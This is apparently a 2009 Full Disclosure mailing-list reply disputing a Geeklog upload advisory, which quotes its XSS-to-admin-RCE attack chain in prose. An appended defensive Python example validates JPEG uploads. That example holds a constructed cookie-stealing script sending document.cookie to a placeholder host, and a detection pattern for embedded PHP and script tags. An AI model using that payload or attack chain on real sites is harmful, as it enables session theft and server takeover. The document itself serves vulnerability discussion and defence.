Full Disclosure mailing list archives

Re: Geeklog <= v1.6.0sr2 - Remote File Upload


From: darky <mlistdarky () gmail com>
Date: Sat, 03 Oct 2009 14:48:06 +0200


> Files with .jpg extensions can be uploaded, but these files can contain
> anything, like JavaScript or PHP code. Using Firefox you can upload any
> file with a .jpg extension and it will be accepted since Firefox sets the
> MIME type based on the file extension.
>
> Uploading usually requires that you first create a user account. Once an
> account is created, you can upload a user photo, which could take advantage
> of this vulnerability.
  
Ok, so this is not a remote file upload issue if you can only upload allowed files (not
files with bad exts); this is just a feature that doesn't validate the MIME type. This can
help with another exploitation, but you can't execute code directly at this point.

> Potential Abuse
> ===============
> Executable JavaScript can easily be uploaded. There are several XSS holes in
> many of the Geeklog plugins which could run the uploaded JavaScript. If a simple
> cookie-stealing JavaScript were uploaded, it could be used to expose the Geeklog
> uid and password hash, which is as good as having the actual password.
  
So you just upload a JS file in order to help you with the XSS?

> If you expose an administrative account, you have full access to the admin
> panel, where you can set the staticpages.PHP permission to true, then create
> a static page that will run any PHP script you desire, potentially exposing
> the entire server.
  
Ok, so here you have a remote code execution in the admin panel.

> Successful exploitation requires the ability to execute the uploaded JavaScript.
> The Geeklog Forum program can be used as an attack vector since it does not
> properly validate many $_GET / $_POST variables.

Could you give us some more details about these XSS vulnerabilities? :)

'Cause all I see here is an RCE in the admin panel.
You confirm that there are XSS holes, but we don't have any details about them...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
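The weak check the thread argues about, and what a server-side check of the file bytes looks like, as an added example. This is not Geeklog code and not part of the thread; it assumes nothing about Geeklog internals, and every sample upload in it (the JPEG skeleton, the script-as-.jpg, the appended and embedded PHP) is constructed for the example.

```python
"""Server-side validation of an uploaded "user photo".

Added example, not Geeklog code and not part of the thread above: it
contrasts the check the advisory describes (a .jpg extension plus the MIME
type the browser supplied) with a check that looks at the bytes themselves.
All sample files below are constructed for this example.
"""
import re

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}          # TEM, RST0..RST7: no length field
SUSPICIOUS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)


def weak_check(filename, client_mime):
    """The check described in the thread: a .jpg extension and the
    Content-Type the browser sent.  Firefox derives that Content-Type from
    the extension, and any client can set it to anything, so it proves
    nothing about the file's content."""
    return filename.lower().endswith(".jpg") and client_mime == "image/jpeg"


def jpeg_segments(data):
    """Walk the marker segments of a JPEG, yielding (marker, payload).

    Raises ValueError on structural problems, including bytes after EOI,
    which is where an appended PHP or JavaScript payload usually lives.
    Entropy-coded scan data is skipped (stuffed FF00 and RSTn are not markers)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI")
    pos = 2
    while True:
        if pos + 2 > len(data) or data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        pos += 2
        if marker == EOI:
            if pos != len(data):
                raise ValueError("%d trailing bytes after EOI" % (len(data) - pos))
            return
        if marker in STANDALONE:
            continue
        length = int.from_bytes(data[pos:pos + 2], "big")
        if length < 2 or pos + length > len(data):
            raise ValueError("bad segment length at offset %d" % pos)
        yield marker, data[pos + 2:pos + length]
        pos += length
        if marker == SOS:
            while True:
                idx = data.find(b"\xff", pos)
                if idx < 0 or idx + 1 >= len(data):
                    raise ValueError("unterminated scan data")
                nxt = data[idx + 1]
                if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:
                    pos = idx + 2             # stuffed byte or restart marker
                    continue
                pos = idx                     # a real marker ends the scan
                break


def strong_check(filename, data):
    """Magic bytes plus the structural walk.  Returns (accepted, reason)."""
    if not filename.lower().endswith(".jpg"):
        return False, "extension not allowed"
    if data[:3] != b"\xff\xd8\xff":
        return False, "not a JPEG (magic bytes)"
    try:
        for marker, payload in jpeg_segments(data):
            if SUSPICIOUS.search(payload):
                return False, "script text inside segment 0x%02X" % marker
    except ValueError as exc:
        return False, str(exc)
    return True, "ok"


def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed JPEG skeleton: SOI, APP0/JFIF, an SOS header, a few bytes of scan
# data containing a stuffed FF00 and an RST0, then EOI.  Structurally valid for
# the walk above; it is not a decodable picture.
JFIF = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
SCAN = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
CLEAN_JPEG = (b"\xff\xd8" + _segment(0xE0, JFIF)
              + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00") + SCAN + b"\xff\xd9")

# Three ways a payload might be dressed up as photo.jpg (all constructed).
SCRIPT_AS_JPG = b"<script>new Image().src='//example.invalid/?c='+document.cookie</script>"
APPENDED_PHP = CLEAN_JPEG + b"<?php echo 'hi'; ?>"                       # PHP after EOI
COMMENT_PHP = b"\xff\xd8" + _segment(0xFE, b"<?php echo 'hi'; ?>") + CLEAN_JPEG[2:]  # in COM

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_JPEG), ("script", SCRIPT_AS_JPG),
                       ("appended", APPENDED_PHP), ("comment", COMMENT_PHP)]:
        print(name, "weak:", weak_check("photo.jpg", "image/jpeg"),
              "strong:", strong_check("photo.jpg", blob))
```

`weak_check` accepts all four samples, because the extension and the browser's Content-Type are both attacker-controlled; `strong_check` rejects the three payloads for three different reasons. The structural walk still cannot prove a file is harmless (bytes can be hidden inside scan data of a picture that decodes fine), so the mitigations that do not depend on parsing matter more: store uploads where no script handler runs, serve them with the stored image type and `X-Content-Type-Options: nosniff`, and re-encode them through an image library so that only pixel data survives. That is also why, as the reply above says, the upload on its own is not code execution: it only becomes one if something else executes or includes the stored file.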

